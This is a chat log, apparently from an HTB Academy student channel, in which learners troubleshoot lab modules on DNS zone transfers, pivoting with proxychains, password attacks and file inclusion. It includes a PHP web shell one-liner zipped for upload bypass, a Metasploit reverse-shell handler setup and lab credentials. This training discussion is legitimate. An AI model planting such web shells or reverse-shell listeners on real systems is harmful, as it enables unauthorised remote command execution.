can u send link

nbm got it

Got it thanks a lot man

I have done normal enumeration and all. Am I missing something super obvious/glaring here?

it should be in there it has been a minute and my notes are lacking on this one

oh you mean once you are on DC01 I assume. I cant get on lol

¯_(ツ)_/¯

like i said it's been a hot minute and i'm currently revamping notes for older sections to bring them up to par

yea fair enough

I am using HTB X Htb labs and on some of the machines its showing i only need to do 1 module to pwn a hard machine ????

It's not like that. It shows which boxes allows you to test the skill you learnt from the module. Not completely pwning it.

I thought we meant to get a shell on the machines??

I am so confused

The flag?

Getting the shell/rce/flag is the ultimate goal, yes.

Yes so isnt that what we meant to do, doesnt htb labs x htb show which modules u should know to pwn the machine?

it gives you an idea of what would be useful to know

Why for soccer it shows only the nmap module

u need to know way more than that

If you're looking for that perspective then, in the htb labs x academy, you would need to search based on machines, instead of modules.

Thats whgat im doing]

yeah soccer only shows nmap

I need to know way more than that

but that's also probably because soccer isn't that difficult in terms of what you should be doing

most likely a bit of exploring a webpage

¯_(ツ)_/¯

I checked a walkthrough they be doing so much stuff irrelevnt to nmap

i mean like the module

Going through the cpts path will give you the skills needed for easy and medium boxes

I cant find that path]

it's a job role path

still doesnt show

CPTS path = penetration tester

Bruh

The whole thing just for easy and medium boxes?

The boxes on htb are tough

Fucking hell alright

that might be feedback for the academy x htb then ¯_(ツ)_/¯

but most of this is basic aside from maybe sqlmap

Instead of it helping me it made me more confused

It's just a light guide. Don't depend on it completely.

but this also isn't the right place to complain about #boxes

¯_(ツ)_/¯

My initial question was about the modules

it's still a box related question at the core

This is what i was talking about

it's possible it wasn't update properly when it retired

the relations aren't a bible to go by

also just because the modules are easy, it's more the implementation that can make a box more difficult

Ok well those modules are defintely not the ones to learn for 'Brain Fuck"

machine

¯_(ツ)_/¯

always

Saying the modules are easy made me die inside haha

i'm talking in relation to their categories as shown

ohh

for the most part if you pay enough attention and take good notes they can be very easy

it just comes down to skill issue

Thats good to hear haha I spent 5 hours today making notes better and getting a better understanding of some modules I completed already

Yep I still need to reup notes from File Transfers on

So

a fair bit to go

i'm also adding notes for the labs for those

not just the skill assess

Yes me also it takes alot more time but it feels worth it

Trying to do report style notes for each lab I do

with screenshots and POC's

linux shell

LFI and File Uploads

Module = File Inclusion
Section = LFI and File Uploads

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

this is work but why the next command don't :

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php

zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)

you are putting the command in .php then ziping shell.txt to shell.php

nop ziping shell.php to shell.txt
the command is different to mv 1 2 | zip 2 1

the final file is shell.txt

the basic command format is;
zip options archive inpath inpath

yep the file parent is in first then the file who put under

you answer to him or me ?

just there

as a thing

okk

@boreal basalt it is working in my case

echo '<?php something ?>' > shell.php && zip shell.txt shell.php

nop

not working | type file shell.jpg then file shell.txt

shell.txt isn't a zip file

is this your command?

technically it's a zipped php file running the command

Any idea why i get this error?
[-] SMB2_CREATE: /home/ltnbob/Documents/.,65,[Errno 2] No such file or directory: '/home/ltnbob/Documents/.'

well; it would seem that directory does not exist

Haha yea but im unable to create that direactory on the HTB Parrot

this looks like you copied it directly from the section. change it to your home path instead

what is the command you ran?

C:>move same.save \10.10.15.212\home\htb-ac-534765\Documents
The system cannot find the file specified.

I did try that too actually

how'd you setup the smb share?

wrap your command in doubleticks

Ohh now I know the problem

hehe

test

Its how I created the share

Sorry long day

haha

wrong sharename?

Yeaa

happens 🤷

yep your right but why shell.jpg is purple and shell.txt is not

that's just extension highlighting

and i can't send scrennshots wtf

.jpg shows as purple

ah

thks

#welcome > non-verified users can't send images

thks

Under the Password Attacks module: Examine the target and find out the password of the user Will. Then, submit the password as the answer. The hint of ||Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.|| Are we supposed to use a mutated version of the list? I used cme to try and access any smb shares, which still no access after getting the password there. Unable to ssh as ||kira|| but was able to ssh into the machine as ||sam from an earlier module||. Do I need to do further enumeration as ||sam||?

which section is that?

Password attacks > Linux Local Password Attacks > Credential Hunting in Linux

You need to mutate the password list based on the information give to you

You're thinking on the right path.

Awesome. I grep'd out the parts of the hint into a new list, so heres to hoping I'll get a quick hit

You don't need to go that far...

They've given you the most important single word information. That's all you need to start working on.

hi everyone

how i can Submit the number of all "A" records from all zones as the answer??
i'm stopped on the last question about
Information Gathering - Web Edition

Page 7
Active Subdomain Enumeration

Active Subdomain Enumeration

can anyone give me some suggestions?

well zone transfer everything you can, then count them

Quicker if you can make use of grep + wc

there are 22, but the answer is wrong

because the answer isn't 22

:)

maybe I didn't understand the question that the site asks me, but do you want the number of transfers? like N , or something else?

CAN SOMEONE TELL ME WHAT YOU WANT? I AM NOT REALLY UNDERSTANDING WHAT TO LOOK FOR

WHAT HTB WANT*

You haven't zone transferred everything

^

and more importantly - your math is wrong :)

i dont understand ahah

pleeeeease heeelp meeee

i wanna understand

porca madonnazza

what do you mean bro? ahahah

well

i mean you're not good at counting

Can only reiterate. Go through everything you found, zone transfer it if possible, then count

kali

grep -v "SOA\|TXT" | wc -l

that may help you with your zone transfer command

For the attacking Thick clients modules, I cannot get the SQL injection working with the Fatty client.

I've tried everything, even what's exactly shown to work in the module. Am I doing something wrong?

first of all, is the command i gave correct?

dig @10.129.190.227 NS axfr inlanefreight.htb

don't need NS

dig axfr inlanefreight.htb @<ip>

https://linux.die.net/man/1/dig

then you need to dig the other zone you have

hi my friend ❤️

so I have to count the zones not only given to me by this command, but also those that I obtained from other commands?

altogether

I mean does the question ask how many subdomains from a single zone or does it ask how many subdomains total

specifics matter

it ask how many a records

"All 'A' records from ALL zones"

with this command don't see them all?

in other words what is the command to see all A records of all zones?

I'm crashing behind this question

First of all, do a zonetransfer

like this
#modules message

the command you're using gives you all the available information for one zone. the output may reveal new zones which you can zone transfer once again

now i have launch this: dig axfr inlanefreight.htb @10.129.113.149

lauched*

I am using powershell revshell and there is no error output of my commands, maybe someone can help me upgrade it to see errors for debuging next steps (Active Directory Enumeration & Attacks
AD Enumeration & Attacks - Skills Assessment Part I)

what part are you on?

i will dm

im still stuck on how to get on DC01 in the AD skills 2 haha

Busy with skill assesment on Windows command line. Can SSH with the first set of credentials but not with the second pair.

dm me if you want

Module: Pivoting, tunneling and port forwarding. Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling Q: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

why im getting that all the hosts are up when i carry out the nmap scan?

this is my scan: proxychains nmap -sn -v 172.16.5.1-200 -T4

because when you're port forwarding you needa do -sT with nmap

what module is that

Introduction to Windows Command Line

Introduction to Windows Command Line

that's because the password is literally the flag from the previous question, it's the same format all the way down

user2 is user1 flag, user3 is user2 flag, user4...

so on and so on

Silly me, thanks!

Performing SYN scans behave weird because of the way packets are altered during a proxied connection.

Doing a full TCP connect scan allows the full connection to be established, so it provides more accurate results.

k ty

i did it with sT but there are 50 hosts up

is that right?

just to add, ICMP don't work when proxying. (in most cases)

https://linuxhint.com/use-nmap-proxychains/

doesn't seem right lol.

they using the same commands than me

can you share the command you used now

proxychains nmap -sT -v 172.16.5.0/24 -T4

proxychains nmap -sT -Pn -v 172.16.5.0/24 -T4

-Pn marks everything as up.

proxychains nmap -sT -p 3389 172.16.5.0/24 -T4

these are all i did

they show me from 172.16.5.192-256 open

        inet 10.129.130.101  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb9:1c4  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:1c4  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:01:c4  txqueuelen 1000  (Ethernet)
        RX packets 67135  bytes 4063107 (4.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 66719  bytes 3628971 (3.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255
        inet6 fe80::250:56ff:feb9:caf4  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:ca:f4  txqueuelen 1000  (Ethernet)
        RX packets 66  bytes 5747 (5.7 KB)
        RX errors 0  dropped 12  overruns 0  frame 0
        TX packets 51  bytes 3568 (3.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 582  bytes 45942 (45.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 582  bytes 45942 (45.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0```

these are the INCs open

so i can only try to pivot in 172.16.5.129

proxychains nmap -sT --top-ports=20 --open 172.16.5.0/23 do this

If you are on the pivot host, do a ping sweep from there and then use nmap to scan the machines specifically.

Most optimal

ping sweep from the pivot machine is what I did for the module too.

doesn't nmap also have just the -sn command as a sweep

instead of needing to specify subnet mask

yes but it doesnt work through proxychains

-sn sends ICMP requests so won't work on pc

AHHHH

ok

Windows Defender block ICMP requests

rude

:(

Not the reason why ICMP pings don't work here in this case.
By defaults pinging is disabled on client windows machine (not the servers mostly).

that was what the module told

We also need to make sure we are aware of the fact that host-alive checks may not work against Windows targets because the Windows Defender firewall blocks ICMP requests (traditional pings) by default.

Am stupid lol

as long as you get it 🙂

A full TCP connect scan without ping on an entire network range will take a long time. So, for this module, we will primarily focus on scanning individual hosts, or smaller ranges of hosts we know are alive, which in this case will be a Windows host at 172.16.5.19.

-.-

this is why reading is important

apparently not as important as my ability to type

hey, all I have a question about which I am stuck :

During an investigation, we discovered a malicious file with an MD5 hash value of 'b40f6b2c167239519fcfb2028ab2524a'. How do we usually call such a hash value in investigations? Answer format: Abbreviation

from which section and module is that

it's from INCIDENT HANDLING PROCESS

Read the chapter again

I did

but sill i didn't get it

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000```
This is the same than doing nc -nlvp 8000 -s 0.0.0.0
Right?

yeah conceptually, i think

yeah, basically

I never tried combining a https reverse shell with nc. I'd assume that breaks though. Never actually read what multi/handler does, but probably does some extra stuff

nc don't handle meterpreter shells.

^

it's one of those it can handle shells, just not meterpreter

conceptually though it's fairly similar

also you shouldn't need to specify -s 0.0.0.0 for nc

The answer is mentioned several times on the page

as by default nc -lvnp listens on 0.0.0.0 (all interfaces)

Did you figure this out?

Just do your brute-forcing using subbrute.

^

Also since you went back that far... I Literally answered them on how to do it

just under that post you replied to

answer is two things; have inlanefreight.htb in your /etc/hosts file, and only needing inlanefreight.htb in the resolvers.txt for subbrute

damn... I just saw a flash.. xD

someone posted some kind of invite link and got banned in nano second

that means the bot is working :D

never saw this crazy agressive bot.. great job whoever made it

Hi, I get the same conclusion, It look like I vn't find any share browsed by sccm to trigger a SMB - NTLM authent to my target host? I tried to track SCCM user activity (logged on console) without any success. Any hint?

Hi, Stuck at the same point any hint? Unable to find a usefull share for that. Any hint?

i have one question about ping sweep

arent the packets that i send doing ping sweep ICMP as well?

Yes

windows > windows internal is not going to be blocked

then why if i do ping sweep inside the target ICMP are not blocked

because trusted machine architecture :P windows can inherently trust systems on the same network

"allow other devices to access this system"

but am sending ICMP to other pc

make sense

I haven't done the module but are you doing that file attack where you get the hashes when someone visits the folder where the file you uploaded is in?

The URL/SCF File attack

can i get some help here? im on HTB academy, linux fundamentals and navigation, and this question is showing up: What is the index number of the "sudoers" file in the "/etc" directory? but when i type the index number 146948 says the answer is incorrect

it's asking for sudoers, not sudoers.d

thank you

note you can also do ls -li /etc/ to list files and their inodes

i found it already and got through the question, im learning so its a bit confusing, appreciate the help ty

nah you're good

just remember usually when they talk about a file they mean the literal file not any additional extensions

Can somebody give me a sanity check on the Passwd, Shadow & Opasswd question in the Password Attacks section.|| I've tried the rockyou.txt, fasttrack.txt, password.list, and mutated password list on the unshadowed file, and none of them work.||

Hello,
I am in the protected files section (password attacks) and I must decrypt kira's ssh private key.
I downloaded it on the pawnbox, and tried
[us-academy-1]─[10.10.14.167]─[htb-ac-746322@htb-uyt3pudr5b]─[~]
└──╼ [★]$ ls
Desktop id_rsa Templates
┌─[us-academy-1]─[10.10.14.167]─[htb-ac-746322@htb-uyt3pudr5b]─[~]
└──╼ [★]$ ssh2john.py id_rsa > hashkey
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

Is this normal? What am I doing wrong?

I just tried it and had no issues. Did you try copy and pasting the contents of the id_rsa into a new file on your pwnbox?